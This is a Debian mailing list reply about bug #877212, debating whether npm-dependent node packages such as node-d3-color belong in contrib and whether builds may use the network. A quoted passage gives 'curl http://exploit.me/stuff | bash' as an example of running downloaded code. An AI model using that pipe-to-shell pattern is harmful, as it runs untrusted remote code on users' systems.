[Pkg-javascript-devel] Bug#877212: Bug#877212: node-d3-color: B-D npm not available in testing

[Pirate Praveen]

On ചൊവ്വ 03 ഒക്ടോബര്‍ 2017 11:04 വൈകു, Gunnar Wolf wrote:
> I *do* take note, however, of:
> 
>     Examples of packages which would be included in contrib are:
> 
>     • free packages which require contrib, non-free packages or packages
>       which are not in our archive at all for compilation or execution,
>       and
>     • wrapper packages or other sorts of free accessories for
>       non-free programs.
> 
> The first point would seem to cover your use case. However, it's not
> necessarily covering (...) compilation or execution via code just
> downloaded. It does not cover the equivalent of
> "curl http://exploit.me/stuff | bash"

Lets take the two issues separately.

1. Whether they are suitable for contrib
2. Whether network can be used during build.

> I would strongly prefer to ship pre-built binaries as part of your
> environment in debian/.
> 
> I guess the ftp-masters approved the packages you mention as they
> *looked* sane, but not because of a deeper inspection of how they were
> built. I see² you have 17 packages in contrib, out of which 14 are
> node-*. Do they all use npm? Would you appreciate if I took a look at
> them and filed bugs accordingly to ask for ftp-masters' opinion?

Like I noted in my previous mail, I already agreed to upload pre-built
binaries and my contention is only on point 1. You may ask ftp-masters
on suitability of them being in contrib even with pre-built binaries.

I have also explained in my previous mails that these are always built
on a maintainer's machine as buildds already prohibit network access
during build. So we are only talking about a change in perception.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: OpenPGP digital signature
URL: <http://lists.alioth.debian.org/pipermail/pkg-javascript-devel/attachments/20171004/6d055acf/attachment-0001.sig>